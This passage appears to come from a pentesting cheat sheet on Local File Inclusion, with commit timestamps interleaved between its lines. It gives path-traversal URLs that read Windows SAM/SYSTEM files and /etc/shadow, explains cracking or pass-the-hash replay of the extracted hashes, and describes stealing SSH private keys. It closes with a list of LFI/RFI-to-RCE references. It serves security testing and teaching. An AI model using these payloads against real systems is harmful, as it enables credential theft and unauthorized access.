This method require high privileges inside the application in order to read the sensitive files.
### Windows version
First extract `sam` and `system` files.
```powershell
http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
```
Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt` , and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
### Linux version
First extract `/etc/shadow` files.
```powershell
http://example.com/index.php?page=../../../../../../etc/shadow
```
Then crack the hashes inside in order to login via SSH on the machine.
2020-10-25 09:51:07 +00:00
Another way to gain SSH access to a Linux machine through LFI is by reading the private key file, id_rsa.
If SSH is active check which user is being used `/proc/self/status` and `/etc/passwd` and try to access `/<HOME>/.ssh/id_rsa` .
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2017-07-04 21:17:59 +00:00
* [OWASP LFI ](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion )
* [HighOn.coffee LFI Cheat ](https://highon.coffee/blog/lfi-cheat-sheet/ )
2018-08-12 21:30:22 +00:00
* [Turning LFI to RFI ](https://l.avala.mp/?p=241 )
2017-09-13 21:55:29 +00:00
* [Is PHP vulnerable and under what conditions? ](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html )
2017-09-23 22:32:55 +00:00
* [Upgrade from LFI to RCE via PHP Sessions ](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ )
* [Local file inclusion tricks ](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html )
2018-08-03 15:56:29 +00:00
* [CVV #1: Local File Inclusion - SI9INT ](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a )
2022-10-09 04:31:43 +00:00
* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos ](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html )
2018-08-19 16:47:32 +00:00
* [Baby^H Master PHP 2017 by @orangetw ](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017 )
2022-10-09 04:31:43 +00:00
* [Чтение файлов => unserialize ! ](https://web.archive.org/web/20200809082021/https://rdot.org/forum/showthread.php?t=4379 )
2018-08-19 16:47:32 +00:00
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse ](https://blog.ripstech.com/2018/new-php-exploitation-technique/ )
2018-10-01 15:11:51 +00:00
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas ](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf )
2019-05-12 19:34:09 +00:00
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018 ](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a )
2019-10-17 15:40:59 +00:00
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction ](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1 )
2022-06-19 20:48:46 +00:00
* [PHP LFI with Nginx Assistance ](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ )
2022-08-09 09:02:21 +00:00
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18 ](https://gynvael.coldwind.pl/?id=376 )
2022-08-21 14:38:54 +00:00
* [LFI2RCE via PHP Filters - HackTricks ](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters )
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d )
2023-03-27 20:38:25 +00:00
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022 ](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html )
* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023 ](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html )